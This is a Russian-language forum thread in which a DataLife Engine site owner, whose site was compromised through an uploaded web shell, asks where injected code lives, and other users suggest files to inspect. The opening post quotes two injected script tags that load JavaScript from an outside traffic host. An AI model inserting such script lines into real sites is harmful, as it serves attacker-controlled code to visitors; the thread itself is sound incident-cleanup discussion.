Вредоносный код в DLE

12 3
D
На сайте с 04.02.2010
Offline
9
4087

Здравствуйте. Сегодня обнаружил в самом верху исходного кода данный код (точнее два):

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7951"></script><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7974"></script>

Взлом был сделан посредством аплоада шелла by oRb. Шелл удалил, а код найти не могу. Переключал шаблоны, код остаётся (в самом верху).

В каких файлах возможно такое изменение, чтобы код был во всех шаблонах?

Высочайший конверт (http://jincash.ru/?ref_id=3731)
WebJunior
На сайте с 11.06.2010
Offline
155
#1

Залейте файлы движка с сервера на компьютер и через Total Commander воспользуйтесь поиском по тексту в файлах.

Как-то так :)

Мой сайт на этом хостинге - https://tuthost.ua/?from=2558 / Верстаю шаблоны (темы с отзывами: https://searchengines.guru/ru/forum/763758, https://searchengines.guru/ru/forum/600404 ).
D
На сайте с 04.02.2010
Offline
9
#2

К сожалению, не найдено. Видимо зашифрован код.

00
На сайте с 10.11.2007
Offline
34
#3

смотрите дату модификации файлов, возможно для верности Вам вставили код во все темы и файлы которые инклудятся при создании стрницы. Если есть возможность залейте бекап, а если нет, то качайте весь движок и ищите руками криптованый код

The_Rock
На сайте с 26.02.2009
Offline
89
#4

Deia, зашифрованным он бы и был зашифрован, у вас открыт. Советую посмотреть engine.php и inc.php. В файлах шаблонов может быть только переход на модуль, модуль же выдает код. Поставить код в .tpl шаблон было бы слишком банально. Если еще не проверяли, что пересмотрите весь код index.php тоже.

Закажи свое видео! Рекламные ролики, обзоры товаров и услуг, заставки... (/ru/forum/comment/12596209) Более 5 лет опыта и сотни довольных заказчиков.
A2
На сайте с 17.11.2009
Offline
52
#5

смотри в первую очередь

index.php

engine/engine.php

D
На сайте с 04.02.2010
Offline
9
#6
asmakovec2:
смотри в первую очередь
index.php
engine/engine.php

Уже проверял в первую очередь

santer_ua
На сайте с 18.09.2009
Offline
13
#7
Deia:
Уже проверял в первую очередь

Посмотри рекламные материалы в админке , у меня так было

D
На сайте с 04.02.2010
Offline
9
#8
santer_ua:
Посмотри рекламные материалы в админке , у меня так было

Всё чисто...

Deia добавил 27.11.2010 в 18:22

Интересно еще то, что данный код есть в админке.

santer_ua
На сайте с 18.09.2009
Offline
13
#9
Deia:
Всё чисто...

Deia добавил 27.11.2010 в 18:22
Интересно еще то, что данный код есть в админке.

смотри файлы шаблона админки

D
На сайте с 04.02.2010
Offline
9
#10

Код (как я уже писал, код в самом верху, выше чем DOCTYPE) в каком-то php файле, который инклудится везде.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий